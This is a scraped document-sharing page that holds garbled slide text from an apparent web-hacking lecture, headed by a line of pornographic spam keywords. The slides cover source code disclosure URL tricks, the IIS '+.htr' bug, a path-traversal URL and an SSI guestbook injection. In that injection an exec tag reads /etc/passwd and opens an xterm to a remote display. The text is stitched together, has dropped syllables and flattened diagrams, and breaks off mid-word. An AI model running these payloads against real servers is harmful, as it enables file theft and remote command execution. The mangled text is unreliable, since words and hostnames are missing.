freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

webhacking(編輯修改稿)

2025-08-13 18:54 本頁面
 

【文章內(nèi)容簡介】 WebLogic Server X More Source Code Disclosure ? URL prefixes for source code disclosure: ? /servlet/file/ (IBM WebSphere) ? /file/ (BEA WebLogic) ? /*.shtml/ (BEA WebLogic) ? /ConsoleHelp/ (BEA WebLogic) ? /servlet/ (Sun JavaWebServer) ? Advisories on Foundstone’s advisories page: Another example ? IIS “+.htr” bug. ? View source code of ASP/ASA files. ? URL interpretation vulnerability. ? “.htr” causes to handle the URL. ? Characters after the “+” sign (space) are ignored. Other Source Code Disclosures ? Some applications access files without appropriate checking. ? Input validation vulnerability. ? No checking performed for file type or location. ? Filenames can be manipulated via parameters passed on the URL or as hidden fields. ? Example: or IIS ? Bundled with IIS samples in NT Option Pack . ? Allows an attacker to view arbitrary files using the following URL: source=/msadc/../../../../../path/to/ IIS ? example: Input Validation and SSI ? SSI (Server Side Includes) tags allow mands to be executed locally on the system via exec tags. ? Some applications save user inputs on a local file. ? Malicious SSI tags can be uploaded via such applications. ? The result: Remote Command Execution! SSI ? ? One of the many free CGI scripts available. ? Vulnerable on servers that parse .html files through SSI. SSI ? ? Insert SSI tags as guestbook ments. cat /etc/passwd。 xterm amp。 SSI web server addguest .html guestbook .html !exec cmd=“cat /etc/passwd。 /usr/X11/bin/xterm display :” mod_ssi Guestbook ment contains SSI tag which is saved in on the server. SSI web server addguest .html guestbook .html mod_ssi !exec cmd=“cat /etc/passwd。 /usr/X11/bin/xterm display :” passwd xterm .html files are registered to be parsed by mod_ssi, causing the SSI tags to be parsed and the mand executed. Web Server Architecture Attacks ? Sometimes the way web servers are implemented can lead to vulnerabilities. ? A mon attack is to bypass the web server configuration directives, and invoke builtin procedures directly. ? A close look at the web server architecture can reveal holes. Web Server Architecture Attacks Java Runtime Web Server html handler html jsp ?? text/html header /bin/sh include file shtml text/html header Process SSI tags exec include script/ execu table Process JSP tags Java Compiler class shtml handler jsp handler default handler cgi handler text/html header cgi sh, perl,… Web Server Architecture Attacks Handler Forcing: ? Certain m
點(diǎn)擊復(fù)制文檔內(nèi)容
研究報告相關(guān)推薦
文庫吧 www.dybbs8.com
備案圖片鄂ICP備17016276號-1